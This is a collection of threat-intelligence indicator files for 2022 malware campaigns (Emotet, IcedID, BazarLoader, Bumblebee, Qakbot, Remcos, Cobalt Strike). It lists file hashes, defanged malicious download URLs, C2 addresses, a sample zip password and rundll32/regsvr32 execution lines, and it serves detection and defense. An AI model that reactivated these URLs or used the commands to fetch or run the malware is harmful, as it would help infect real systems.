10 | - Subject: Wellfargo Payment Remittance Notice-1/4/22 11 | - Attachment: Payment Remittance Advice_000000202213.xlsb 12 | 13 | ATTACHMENT INFO: 14 | 15 | - SHA256 hash: b1df072eba923c472e461200b35823fde7f8e640bfb468ff5ac707369a2fa35e 16 | - File size: 156,401 bytes 17 | - File name: Payment Remittance Advice_000000202213.xlsb 18 | - File description: Attachment to email: Excel file with macro code for Remcos RAT 19 | 20 | URL GENERATED BY MACRO: 21 | 22 | - hxxp://onedrive[.]live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU 23 | 24 | VBS FILE RETURNED FROM ONEDRIVE URL: 25 | 26 | - SHA256 hash: 95c0a9e6463a2eb1bbfe3198cd4b6cd74927a209ca4ab17501c2f444494f4499 27 | - File size: 2,340 bytes 28 | - File location: hxxps://onedrive.live[.]com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU 29 | - File location: C:\Users\[username]\AppData\Local\Temp\misc.vbs 30 | - File location: C:\Users\[username]\AppData\Local\Microsoft\misc.vbs 31 | 32 | TRAFFIC GENERATED BY DOWNLOADED VBS FILE: 33 | 34 | - 64.188.19[.]241 port 80 - 64.188.19[.]241 - GET /atcn.jpg 35 | - 104.223.119[.]167 port 80 - 104.223.119[.]167 - GET /calient.jpg 36 | - 79.134.225[.]79 port 10174 - shiestynerd.dvrlists[.]com - encrypted SSL/TLS traffic 37 | 38 | DLL FILE EXTRACTED FROM OBFUSCATED SCRIPT RETUNRED BY 104.223.119[.]167: 39 | 40 | - SHA256 hash: 73ee036d191c9b2d717e94b2bae87622fce097a42d61594ee8cc1ab5b92749f1 41 | - File size: 409,882 bytes 42 | - File type: PE32 DLL, 32-bit Mono/.Net assembly 43 | -------------------------------------------------------------------------------- /2022-01-12-IOCs-for-IcedID-with-Cobalt-Strike-and-DarkVNC.txt: -------------------------------------------------------------------------------- 1 | 2022-01-12 (WEDNESDAY) - ICEDID (BOKBOT) WITH COBALT STRIKE AND DARK VNC 2 | 3 | NOTES: 4 | 5 | - This campaign first reported on Tuesday 2022-01-11 in this Twitter thread: https://twitter.com/executemalware/status/1481048885284020230 6 | 7 | INFECTION CHAIN: 8 | 9 | - email --> link --> downloaded XLL file --> dropped DLL for IcedID installer --> web traffic --> persistent IcedID --> IcedID C2 --> Follow-up malware (Cobalt Strike and DarkVNC) 10 | 11 | URL FROM MALSPAM: 12 | 13 | - hxxps://www.royalcityplumbing[.]ca/wp-content/plugins/wp-roilbask/includes/?FQUVPKMwuZrjyvabRIB 14 | 15 | DOWNLOADED XLL FILE: 16 | 17 | - SHA256 hash: c9c6b253530238054aa343c132836c934b94413d1c768ed77417e6c7a72edd00 18 | - File size: 72,704 bytes 19 | - File location: hxxps://www.royalcityplumbing[.]ca/wp-content/plugins/wp-roilbask/includes/?FQUVPKMwuZrjyvabRIB 20 | - File name: DH-1641998904.xll 21 | - File description: Downloaded Excel add-on file 22 | 23 | INSTALLER DLL: 24 | 25 | - SHA256 hash: cbd2e49a46f4f9df1bbcd8eb7ba048692a3ddf0108aef42ff5381c3a3c572b0f 26 | - File size: 42,496 bytes 27 | - File location: C:\Users\[username]\JavaClassObjectCm.dll 28 | - File description: Installer DLL for IcedID 29 | - Run method: rundll32.exe [filename],DllGetClassObject 30 | 31 | GZIP BINARY: 32 | 33 | - SHA256 hash: a2c8441342c1ebd7d5fe65dc59fc17ded908f3888feb6659aefb97b0fc476d9d 34 | - File size: 457,853 bytes 35 | - File location: hxxp://olerantand[.]top/ 36 | - File type: gzip compressed data, was "Orphan.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2529244 37 | - File description: gzip binary retreived by installer to create license.dat and persistent IcedID DLL 38 | 39 | LICENSE.DAT: 40 | 41 | - SHA256 hash: cfc202b44509f2f607d365858a8218dfdc6b26f8087efcc5e46f4fef9ab53705 42 | - File size: 341,898 bytes 43 | - File location: C:\Users\[username]\AppData\Roaming\FirstInherit\license.dat 44 | - File description: data file used to run persistent IcedID DLL 45 | - Note: First submitted to VirusTotal on 2021-11-24 46 | 47 | PERSISTENT ICEDID DLL: 48 | 49 | - SHA256 hash: e7b98a1b6c6b463d309a2a067b8c7362888e5d1d96ce983558c96e96c8d73ad9 50 | - File size: 115,200 bytes 51 | - File location: C:\Users\[username]\AppData\Roaming\kosohu\Gigaod32\Jugeejmo2.dll 52 | - File description: Persistent DLL for IcedID 53 | - Run method: rundll32.exe [filename],DllMain --exibga="[path to license.dat]" 54 | 55 | TRAFFIC FOR THE GZIP BINARY: 56 | 57 | - 159.89.171[.]14 port 80 - olerantand[.]top - GET / 58 | 59 | ICEDID C2 IP ADDRESSES AND DOMAINS: 60 | 61 | - 45.147.228[.]138 port 443 - charliedeffer[.]store 62 | - 45.147.228[.]138 port 443 - hashingold[.]top 63 | - 45.147.228[.]138 port 443 - namerikode[.]uno 64 | - 185.70.186[.]133 port 443 - lasticjugs[.]top 65 | - 185.70.186[.]133 port 443 - ouldmakeithapp[.]top 66 | 67 | COBALT STRIKE BINARY: 68 | 69 | - SHA256 hash: 94053dfbc06bc7124129dd51fabf67f7f3738109d6dc11d0b4bb785f0e93c0b6 70 | - File size: 398,336 bytes 71 | - File location: hxxp://104.168.44[.]45/download/4564.exe 72 | - File location: C:\Users\[username]\AppData\Local\Temp\Ayfaga3.exe 73 | - File description: EXE for Cobalt Strike seen as follow-up to IcedID infection 74 | 75 | COBALT STRIKE TRAFFIC: 76 | 77 | - 104.168.44[.]45 port 80 - 104.168.44[.]45 - GET /download/4564.exe 78 | - 104.168.44[.]45 port 443 - HTTPS Cobalt Strike traffic 79 | 80 | UNUSUAL TRAFFIC (DON'T KNOW WHAT THIS WAS CAUSED BY): 81 | 82 | - 185.70.184[.]43 port 8572 - HTTPS/SSL/TLS traffic 83 | 84 | DARK VNC TRAFFIC: 85 | 86 | - 45.147.228[.]197 port 8080 - encrypted or otherwise encoded traffic 87 | 88 | -------------------------------------------------------------------------------- /2022-02-07-IOCs-for-BazarLoader-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-02-07 (MONDAY) - BAZARLOADER INFECTION WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> OneDrive link --> downloaded .iso file --> double-click (mount) .iso file --> double-click Windows shortcut --> BazarLoader infection --> Bazar C2 --> Cobalt Strike 6 | 7 | EXAMPLE OF ONEDRIVE LINK: 8 | 9 | - hxxp://1drv[.]ms/u/s!AoKLsbl6G4QIgQiYSBQ37JfA8_fl?e=ecg04E 10 | 11 | - NOTE: The above OneDrive link was taken down by Microsoft shortly after it was reported as malicious 12 | 13 | DOWNLOADED ISO FILE: 14 | 15 | - SHA256 hash: 0900b4eb02bdcaefd21df169d21794c8c70bfbc68b2f0612861fcabc82f28149 16 | - File size: 307,200 bytes 17 | - File name: docs_1309.iso 18 | 19 | CONTENTS OF ISO FILE: 20 | 21 | - SHA256 hash: 303be66bb8f026a9153b749eff2446fe5a0f9f75c52c49af84210187d257f2de 22 | - File size: 1,385 bytes 23 | - File name: Attachments.lnk 24 | - File type: MS Windows shortcut 25 | - Shortcut: C:\Windows\System32\rundll32.exe documents.log,vspa 26 | 27 | - SHA256 hash: 8a09d53d9663eda55e91e4803a5222be9b3b0c804173b6a918d13c35ad1d0134 28 | - File size: 253,440 bytes 29 | - File name: documents.log 30 | - File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows 31 | - Run method: rundll32.exe [filename],vspa 32 | 33 | BAZAR C2 TRAFFIC: 34 | 35 | - 5.182.207.28 port 443 - hxxps://5.182.207[.]28/data/service 36 | - 198.252.108.16 port 443 - hxxps://198.252.108[.]16/data/service 37 | - 80.71.158.142 port 443 - attempted TCP connections 38 | - 84.32.188.136 port 443 - hxxps://84.32.188[.]136/data/service 39 | 40 | COBALT STRIKE BINARY: 41 | 42 | - SHA256 hash: 12f7f6b7e1840a15e141abadf099efa435a608afb19176816f131f5172bd7cd2 43 | - File size: 98,712 bytes 44 | - File location: C:\Users\[username]\AppData\Local\Temp\BEB2.dll 45 | - File type: PE32 executable (DLL) (console) Intel 80386, for MS Windows 46 | - Run method: regsvr32.exe [filename] 47 | 48 | COBALT STRIKE C2 TRAFFIC: 49 | 50 | - 23.82.141[.]117 port 443 ? zoroxeku[.]com - HTTPS traffic 51 | -------------------------------------------------------------------------------- /2022-02-17-IOCs-for-Bazil-targeted-malware-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-02-17 (THURSDAY) - WINDOWS INFECTION ACTIVITY FROM BRAZIL-TARGETED MALSPAM 2 | 3 | EMAIL HEADERS: 4 | 5 | Received: from thiag77940[.]vds (mail01.nota-comercio.com [195.28.183[.]90]) 6 | (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) 7 | key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256) 8 | (No client certificate requested) 9 | by [recipient's mail server] (Postfix) with ESMTPS id 4JzGT109qhz3wZQ 10 | for <[recipient's email address]>; Wed, 16 Feb 2022 11:49:03 +0000 (UTC) 11 | Received: by thiag77940[.]vds (Postfix, from userid 0) 12 | id 9A0DC7EA80; Wed, 16 Feb 2022 11:48:38 +0000 (UTC) 13 | Subject: Arquivo NF-e - Pedido N (46512154) 14 | From: nfe@nfpaulista.com 15 | Message-Id: <20220216114838.9A0DC7EA80@thiag77940[.]vds> 16 | Date: Wed, 16 Feb 2022 11:48:38 +0000 (UTC) 17 | 18 | LINK FROM THE EMAIL: 19 | 20 | - hxxp://nfe5.doomdns[.]org/ 21 | 22 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 23 | 24 | - 20.77.245[.]61 port 80 - nfe5.doomdns[.]org - GET / 25 | - 20.77.245[.]61 port 80 - download2.go.dyndns[.]org - GET /5E%2028%205B%205E_5E128%205B%205E_5E%2028%205B%205E_5E128%205B%205E_5E%2028%205B%205E_5E128%205B%205E_/ 26 | - 20.77.245[.]61 port 80 - nfe6.dyndns[.]ws - GET /Nota.zip 27 | - 52.161.99[.]171 port 80 - plugtree.duckdns[.]org - GET /libwinpthread-1.css 28 | - 20.77.245[.]61 port 80 - clientes.is-saved[.]org - POST /clientes/postUP.php 29 | 30 | ASSOCIATED MALWARE: 31 | 32 | - SHA256 hash: eb5a367f80ee1dd72a5b7ae184dddf6d4b72f2799f0ff8f221b8a79728734264 33 | - File size: 2,699,362 bytes 34 | - File location: hxxp://nfe6.dyndns[.]ws/Nota.zip 35 | - File description: Zip archive downloaded after clicking link in email 36 | 37 | - SHA256 hash: 5b84585b8335d7f30f3891ab75d55c9caf67c40499a2297f01ade237d29f012c 38 | - File size: 2,862,080 bytes 39 | - File name: GHDJ-87678A-1A.msi 40 | - File description: MSI file extracted from above zip archive 41 | 42 | - SHA256 hash: d76dda172fd4cb6abf1edd258c34bc05eb457a13ecb1e4beeea1fbf7e74ddcf3 43 | - File size: 18,900,737 bytes 44 | - File location: hxxp://plugtree.duckdns[.]org/libwinpthread-1.css 45 | - File description: Zip archive retrieved by above MSI file 46 | - Note: This zip archive contains files used to run the Pidgin chat client for Windows, along with a malicious DLL run by pidgin.exe 47 | 48 | - SHA256 hash: 32e13b3fcf43c37184b5b5eaca2a32ba24342260dea8514b19187f20cc417514 49 | - File size: 809,772,783 bytes 50 | - File name: libpurple.dll 51 | - File description: malicious 32-bit DLL run by pidgin.exe 52 | 53 | Note: The above DLL is padded with null bytes at the end of the file. At nearly 810 MB, this malware is too large to submit to Virus Total or other online analysis tools. A carved version with most of the null bytes removed is listed below. 54 | 55 | - SHA256 hash: e1ddfe00dd1ada634b965c9e444cbd52fa02770d7dd1c3c31949b5e52fff4049 56 | - File size: 12,134,400 bytes 57 | - File description: The above libpurple.dll file with most of the null bytes at the end of the file removed 58 | -------------------------------------------------------------------------------- /2022-02-22-Emotet-epoch4-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2022-02-22 (TUESDAY) - EMOTET EPOCH 4 INDICATORS 2 | 3 | NOTE: 4 | 5 | - This is a small set of indicators for Emotet epoch 4 activity on 2022-02-22 6 | 7 | SHA256 HASHES FROM 2 EXAMPLES OF PASSWORD-PROTECTED ZIP ATTACHMENT AND EXTRACTED EXCEL FILES: 8 | 9 | - NOTE: zip password: 4vahobk5lzs 10 | - 2393aa0a0424086dc266fd5b5370f1f7a365f5c70ae33334a4d760cd084e19de 2022-22-02_1239.zip 11 | - 0ccfb233a6d245f9f626e6f2e320497c44870d23ac070821490de5495ad5978a 2022-22-02_1239.xls 12 | - 3689034e54b8e8cd72b779daf8e35765f495e46ca0107affd702e1ec731a576b 2022-22-02_1617.zip 13 | - dfcb4b56f39a4578d47734699e8d24036bee228940fe3f2db3f7ec6876b4fd9e 2022-22-02_1617.xls 14 | 15 | SHA256 HASHES FROM 12 EXAMPLES OF ATTACHED EXCEL FILES: 16 | 17 | - 258ef1257f5d2f90eeb7b0e1a948e08bfc0e25cc014f86e05df02a344c5eabdf Barker Cabinets.xls 18 | - 2b87f525b90d47410cb6240f949140ff81d39b467ebe675bffaf2f0b360a16a7 Payment.xls 19 | - 36ea088ffc747d149aab4ddf89182ce618edb7754b8643e4d9ae69dbabd759c8 ACH Payment info.xls 20 | - 3dac3ccac97fe026839c988180072987c7fe20d4eacdf76868564480879c2f72 Global Information Technology Inc.xls 21 | - 52c27e74e1d7a494cda92876fe33c1e397dbc53cf9e5657e4590a9af77f57f3b 1008397229627355965.xls 22 | - 5813667c73a3ec74cb979c55c19102e819f659bc97d24fa4888b2612c982fff3 HHC774705930DP.xls 23 | - 69b8ed3cdc49ffc2638df7d3c12e53fc553f12cca769fdc2030ec8f739e3cdc8 PO 02222022.xls 24 | - 6bf75d05768e1c4417ffa6a98a7154041992b9888e3252983bb6d796a7fb4deb comments_208697167.xls 25 | - ba07555c7cb0e846bb693ac3d391b47cad49443bae7dfae2e43e65d70c6eb2d0 OVW-010222 IVLY-220222.xls 26 | - c9332bc46897abfface9a0a4400475c552c970a180176d2b8e5a18b1635594f1 PA-2241 report.xls 27 | - d33426fc6cd7365ed49d0c847600e1a73be2630c033601260c63bc4b4aeeeac5 Scott Murdock Trailer Sales.xls 28 | - f67e201abcb2128d7df61e93171e5a9072a29601047a727acd37b392afda790a B and C Body Company.xls 29 | 30 | SHA256 HASH FOR C:\PROGRAMDATA\BBIWJDF.VBS DROPPED AFTER ENABLING EXCEL MACRO: 31 | 32 | - 31cb0d7a224f16ec4e998140c4efde8ef752295b8a88080915f0bb2b49034bee 33 | 34 | ABOVE VBS USES THE FOLLOWING URLS TO RETRIEVE AN EMOTET DLL: 35 | 36 | - hxxp://wearsweetbomb[.]com/wp-content/15zZybP1EXttxDK4JH/ 37 | - hxxps://1566xueshe[.]com/wp-includes/z92ZVqHH8/ 38 | - hxxp://mymicrogreen.mightcode[.]com/Fox-C/NWssAbNOJDxhs/ 39 | - hxxp://o2omart.co[.]in/infructuose/m4mgt2MeU/ 40 | - hxxp://mtc.joburg.org[.]za/-/GBGJeFxXWlNbABv2/ 41 | - hxxp://www.ama[.]cu/jpr/VVP/ 42 | - hxxp://actividades.laforetlanguages[.]com/wp-admin/dU8Ds/ 43 | - hxxps://dwwmaster[.]com/wp-content/1sR2HfFxQnkWuu/ 44 | - hxxps://edu-media[.]cn/wp-admin/0JAE/ 45 | - hxxps://iacademygroup[.]cl/office/G42LJPLkl/ 46 | - hxxps://znzhou[.]top/mode/0Qb/ 47 | 48 | SHA256 HASH FOR AN EMOTET DLL AT C:\PROGRAMDATA\OIPHILFJ.DLL: 49 | 50 | - b4b5d17481e99f072a5b7c568248579611b91bfc7e6c893ab2a4fd74f2b48414 51 | 52 | EMOTET C2 FROM AN INFECTED WINDOWS HOST: 53 | 54 | - 134.209.156[.]68:443 55 | - 144.217.88[.]125:443 56 | - 156.67.219[.]84:7080 57 | - 175.107.196[.]192:80 -------------------------------------------------------------------------------- /2022-02-22-Emotet-epoch5-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2022-02-22 (TUESDAY) - EMOTET EPOCH 5 INDICATORS 2 | 3 | NOTE: 4 | 5 | - This is a small set of indicators for Emotet epoch 5 activity on 2022-02-22 6 | 7 | SHA256 HASHES FROM 5 EXAMPLES OF ATTACHED EXCEL FILES: 8 | 9 | - 296694bd1aed4a2e6d1ba06859e978a869dac37d3a7d1d7a1b3ed1f44cbd1979 97-22022022.xls 10 | - 5bb4f8da9b1de0a2472b752b640c418f851756002b739dc78d1459f04d9af600 Data 4.xls 11 | - 5bcf051f92d382bee159d249ab6551fcfa4c41573aca4e28ef275694820b6370 479DA-2778.xls 12 | - 6bf75d05768e1c4417ffa6a98a7154041992b9888e3252983bb6d796a7fb4deb comments_208697167.xls 13 | - ecdf22c55102caa1405093b2fb7fdd178f233c39fdd750a123dd1409919ba695 Untitled-0438531018.xls 14 | 15 | SHA256 HASH FOR C:\PROGRAMDATA\BBIWJDF.VBS DROPPED AFTER ENABLING EXCEL MACRO: 16 | 17 | - 555c1a3f0d1ff08f3a45c7558ded360c36b86541eae3ba84eb6b5aaba0c4c661 18 | 19 | ABOVE VBS USES THE FOLLOWING URLS TO RETRIEVE AN EMOTET DLL: 20 | 21 | - hxxp://boardingschoolsoftware[.]com/backup/VC7WK/ 22 | - hxxp://towardsun[.]net/admin/O29Fja/ 23 | - hxxp://47.244.189[.]73/well-known/cwxgmEZsYIT/ 24 | - hxxp://centrobilinguelospinos[.]com/wp-admin/AivCY/ 25 | - hxxp://qqziyuanwang[.]com/wp-includes/KtXrm5GwJ/ 26 | - hxxps://www.swaong[.]com/b/SVSAPzeDU657xJdmJv/ 27 | - hxxps://trasix[.]com/wp-admin/FzpdyUrlGt/ 28 | - hxxps://marineboyrecords[.]com/font-awesome/t37LOj/ 29 | - hxxps://edgetactical.ritabilisim[.]com/admin/NbjDzEeNJ/ 30 | - hxxp://cairm[.]xyz/backup_1/mQPAhJhpV/ 31 | - hxxp://vrstar-park[.]com/wp-includes/0bAm9feNorwTmVrj/ 32 | - hxxps://panaderialaimperial[.]com/wp-includes/Oi0guE0CQbyBJVg/ 33 | 34 | SHA256 HASH FOR AN EMOTET DLL AT C:\PROGRAMDATA\OIPHILFJ.DLL: 35 | 36 | - a83c22f222be787c8c45ea6eb55b7f07c8c7cba6b5c8233b075bb2472a8f4acb 37 | 38 | EMOTET C2 FROM AN INFECTED WINDOWS HOST: 39 | 40 | - 27.254.174[.]84:8080 41 | - 43.229.206[.]214:8080 42 | - 59.148.253[.]194:443 43 | - 61.7.231[.]229:443 44 | - 142.93.76[.]76:7080 45 | - 168.197.250[.]14:80 46 | - 180.250.21[.]2:443 -------------------------------------------------------------------------------- /2022-03-03-IOCs-for-Bazil-targeted-malware-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-03-03 (THURSDAY) - WINDOWS INFECTION ACTIVITY FROM BRAZIL-TARGETED MALSPAM 2 | 3 | NOTE: 4 | 5 | - We reported a similar infection using similiar indicators on 2022-02-17: https://twitter.com/Unit42_Intel/status/1496172957726560257 6 | 7 | EMAIL HEADERS: 8 | 9 | Received: from ruvds-bxhg9 (unknown [194.87.107[.]33]) 10 | (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) 11 | key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256) 12 | (No client certificate requested) 13 | by [recipient's mail server] (Postfix) with ESMTPS id 4K8Gs81q4bzFpVs 14 | for <[recipient's email address]>; Thu, 3 Mar 2022 03:37:43 +0000 (UTC) 15 | Received: by ruvds-bxhg9 (Postfix, from userid 0) 16 | id C89E4E2C5E; Thu, 3 Mar 2022 06:07:02 +0300 (MSK) 17 | content-type: text/html 18 | Subject: NF-e - Pedido N (46512154) 19 | From: nfe@empresajobs.com 20 | Message-Id: <20220303033528.C89E4E2C5E@ruvds-bxhg9> 21 | Date: Thu, 3 Mar 2022 03:07:02 -0000 (UTC) 22 | 23 | LINK FROM THE EMAIL: 24 | 25 | hxxp://fiscal.servebbs[.]com 26 | 27 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 28 | 29 | - 20.77.245[.]61 port 80 - fiscal.servebbs[.]com - GET / HTTP/1.1 30 | - 20.77.245[.]61 port 80 - fiscal.servebbs[.]com - GET /favicon.ico HTTP/1.1 31 | - 20.77.245[.]61 port 80 - download2.go.dyndns[.]org - GET /5E%2028%205B%205E_5E128%205B%205E_5E%2028%205B%205E_5E128%205B%205E_5E%2028%205B%205E_5E128%205B%205E_/ HTTP/1.1 32 | - 20.77.245[.]61 port 80 - fiscal.homelinux[.]com - GET /Nota.zip HTTP/1.1 33 | - 52.161.99[.]171 port 80 - plugtree.duckdns[.]org - GET /libwinpthread-1.css HTTP/1.1 34 | - 20.77.245[.]61 port 80 - clientes.is-saved[.]org - POST /clientes/postUP.php HTTP/1.0 35 | 36 | ASSOCIATED MALWARE: 37 | 38 | - SHA256 hash: 9b86c38d0c1f3db86087cdd6463500843061180bd92f9f485ac674e0c6bdb9ea 39 | - File size: 2,698,165 bytes 40 | - File location: hxxp://fiscal.homelinux[.]com/Nota.zip 41 | - File description: Zip archive downloaded after clicking link in email 42 | 43 | - SHA256 hash: 6c646d75e7b79221a518ad57812991945e08a4679fbd51b44b1fb3bfe15870e3 44 | - File size: 2,862,080 bytes 45 | - File name: IM-87678A-1A1.msi 46 | - File description: MSI file extracted from above zip archive 47 | 48 | - SHA256 hash: 2ac951c753fd352c6f4fed3644ef770b05afbd25a1282400d7fc1070d7743ae9 49 | - File size: 18,200,641 bytes 50 | - File location: hxxp://plugtree.duckdns[.]org/libwinpthread-1.css 51 | - File description: Zip archive retrieved by above MSI file 52 | - Note: This zip archive contains files used to run the Pidgin chat client for Windows, along with a malicious DLL run by pidgin.exe 53 | 54 | - SHA256 hash: 3afb9a436ca84260a2d7876646a6b999ece5c5a6a7f0f464ee6ca40e5b639834 55 | - File size: 12,226,048 bytes 56 | - File name: libpurple.dll 57 | - File description: malicious 32-bit DLL run by pidgin.exe 58 | -------------------------------------------------------------------------------- /2022-03-03-IOCs-for-Emotet-epoch4-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-03-03 (THURSDAY) - EMOTET EPOCH 4 INFECTION WITH COBALT STRIKE 2 | 3 | EMAIL HEADERS: 4 | 5 | - Received: from mbkd5118.ocn.ad[.]jp (mbkd5118.ocn.ad[.]jp [210.163.237[.]19]) 6 | - Received: from mf-smf-unw002c1.ocn.ad[.]jp (mf-smf-unw002c1.ocn.ad.jp [153.138.219[.]69]) 7 | - Received: from ocn-vc-mts-204c1.ocn.ad[.]jp ([125.206.160[.]20]) 8 | - Received: from ocn-sdpx-mts-106c1.ocn.ad[.]jp ([211.16.10[.]147]) 9 | - Received: from [83.149.169[.]122] (unknown [83.149.169[.]122]) 10 | - From: [spoofed sender name] 11 | - Subject: RE: 12 | - Message-ID: <1646294430.PgNxnZGKUhFIAPgNxnnFKx@ocn-vc-mts-204c1.ocn.ad[.]jp> 13 | - Attachment name: Form - Mar 03, 2022.xlsm 14 | 15 | EMAIL ATTACHMENT: 16 | 17 | - SHA256 hash: a962e9bd50bc35620f3faac38c064389b7bab79eb497ddd84f83bf2e39033e18 18 | - File size: 46,701 bytes 19 | - File name: Form - Mar 03, 2022.xlsm 20 | - File description: Excel file with macro for Emotet epoch 4 21 | 22 | URLS GENERATED BY ABOVE EXEL MACRO CODE FOR EMOTET EPOCH 4 DLL: 23 | 24 | - hxxp://piajimenez[.]com/Fox-C/dS4nv3spYd0DZsnwLqov/ 25 | - hxxp://inopra[.]com/wp-includes/3zGnQGNCvIKuvrO7T/ 26 | - hxxp://biomedicalpharmaegypt[.]com/sapbush/BKEaVq1zoyJssmUoe/ 27 | - hxxps://getlivetext[.]com/Pectinacea/AL5FVpjleCW/ 28 | - hxxp://janshabd[.]com/Zgye2/ 29 | - hxxps://justforanime[.]com/stratose/PonwPXCl/ 30 | 31 | EMOTET EPOCH 4 DLL: 32 | 33 | - SHA256 hash: 0758b3cde229886a039202120cda4485426c56eed3596be75fbce0d38986bf03 34 | - File size: 638,976 bytes 35 | - File location: - hxxp://piajimenez[.]com/Fox-C/dS4nv3spYd0DZsnwLqov/ 36 | - File location: C:\enu.ocx 37 | - File location: C:\Users\[username]\AppData\Local\Snirakw\pzgi.por 38 | - File description: Windows DLL file for Emotet epoch 4 39 | - Run method: regsvr32.exe /s [filename] 40 | 41 | FOLLOW-UP MALWARE (COBALT STRIKE): 42 | 43 | - SHA256 hash: 9f968a4a386057575174533e82c2eeb0b39c1875a07b6a8d1a8124962abe11e7 44 | - File size: 673,792 bytes 45 | - File location: C:\Users\[username]\AppData\Local\Snirakw\dehpaxvktbwu.exe 46 | - File description: Windows EXE file for Cobalt Strike 47 | - Post-infection traffic: hxxps://gfsert[.]com/jquery-3.3.1.min.js 48 | 49 | - SHA256 hash: 100e1dc124dc6131617b5610ee750e529cda80fcaf0ee5437b3e27db150ee860 50 | - File size: 1,202,176 bytes 51 | - File location: C:\Users\[username]\AppData\Local\Snirakw\rahgobkzm.dll 52 | - File description: Windows DLL file for Cobalt Strike 53 | - Run method: regsvr32.exe /s [filename] 54 | - Post-infection traffic: hxxps://zxerm[.]com/jquery-3.3.1.min.js 55 | 56 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 57 | 58 | - 144.208.73[.]119 port 80 - piajimenez[.]com - GET /Fox-C/dS4nv3spYd0DZsnwLqov/ 59 | 60 | - 139.180.205[.]161 port 443 - attempted TCP connections 61 | - 209.15.236[.]39 port 8080 - attempted TCP connections 62 | - 195.154.253[.]60 port 8080 - attempted TCP connections 63 | - 217.182.143[.]207 port 443 - HTTPS traffic 64 | - 217.79.180[.]211 port 8080 - HTTPS traffic 65 | 66 | - 139.60.160[.]52 port 443 - gfsert.com - hxxps://gfsert[.]com/jquery-3.3.1.min.js 67 | - 139.60.161[.]53 port 443 - zxerm.com - hxxps://zxerm[.]com/jquery-3.3.1.min.js 68 | - 45.77.212[.]132 port 444 - (formatordpink[.]com) - hxxps://formatordpink[.]com/tab_shop.js 69 | 70 | - NOTE: Could not find an associated Cobalt Strike binary for traffic on 45.77.212[.]132 over TCP port 444. 71 | -------------------------------------------------------------------------------- /2022-03-21-IOCs-for-Cobalt-Strike-from-IcedID-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-03-21 (MONDAY) - COBALT STRIKE FROM ICEDID (BOKBOT): 2 | 3 | POST-INFECTION ICEDID C2 TRAFFIC: 4 | 5 | - 157.245.142[.]66 port 443 - antnosience[.]com - HTTPS traffic 6 | 7 | SUPSPICIOUS ACTIVITY SEEN WITHIN 1 MINUTE BEFORE COBALT STRIKE TRAFFIC: 8 | 9 | - port 443 - filebin[.]net - HTTPS traffic (a legitimate file sharing service) 10 | - port 443 - situla.bitbit[.]net - HTTPS traffic (another domain associated with file sharing) 11 | 12 | COBALT STRIKE 64-BIT EXE: 13 | 14 | - SHA256 hash: 09d8fb54a22c3bb753fce7dc5192221122cf5dc26b42504ffca254e2521dbf8e 15 | - File size: 474,624 bytes 16 | - File location: C:\Users\[username]\AppData\Local\Temp\ifof.exe 17 | - File type: PE32+ executable (GUI) x86-64, for MS Windows 18 | - Sample: https://bazaar.abuse.ch/sample/09d8fb54a22c3bb753fce7dc5192221122cf5dc26b42504ffca254e2521dbf8e/ 19 | 20 | 21 | COBALT STRIKE C2 TRAFFIC: 22 | 23 | - 23.227.198[.]203 port 757 - hxxps://bupdater[.]com:757/link.css 24 | -------------------------------------------------------------------------------- /2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-04-05 (MONDAY) - BUMBLEBEE INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - Bumblebee malware associated with threat actor EXOTIC LILY was reported by Google's Threat Analysis Group (TAG) in March 2022. 6 | 7 | - For more information, see: https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/ 8 | 9 | - Was not able to recover Cobalt Strike binary from this infection example. 10 | 11 | ASSOCIATED MALWARE: 12 | 13 | - SHA256 hash: a3e023f9666dfacbbc028212682390de436a78e4291c512b0b9f022a05b138f8 14 | - File size: 2,555,904 bytes 15 | - File name: documents-0405-13.iso 16 | - File description: Malicious ISO file with Bumblebee malware 17 | 18 | - SHA256 hash: 9dfb32ed9b5756151623a8049eaa7785bf761601eb6c7165beff489cce31bb08 19 | - File size: 1,199 bytes 20 | - File name: documents.lnk 21 | - File description: Windows shortcut to run Blumblebee DLL 22 | - Shortcut: rundll32.exe setting.dll,IternalJob 23 | 24 | - SHA256 hash: 131f7e18bc3ea50cdcf74b618c24f5ae1b38594f8649d80538566b1cceeec683 25 | - File size: 2,502,144 bytes 26 | - File name: setting.dll 27 | - File description: Windows DLL for Bumblebee malware 28 | - Run method: rundll32.exe setting.dll,IternalJob 29 | 30 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 31 | 32 | - 192.236.198[.]63 port 443 - 192.236.198[.]63 - Bumblebee HTTPS C2 traffic 33 | - 23.108.57[.]23 port 443 - cuhitiro[.]com - Cobalt Strike traffic 34 | -------------------------------------------------------------------------------- /2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-04-14 (THURSDAY) - AA DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> link --> zip --> extracted .msi file --> dropped Qakbot DLL --> Qakbot C2 --> Cobalt Strike 6 | 7 | NOTES: 8 | 9 | - Also known as TA577, aa distribution Qakbot started using .msi files in downloaded zip archives as of Monday 2022-04-11. 10 | - Reference: 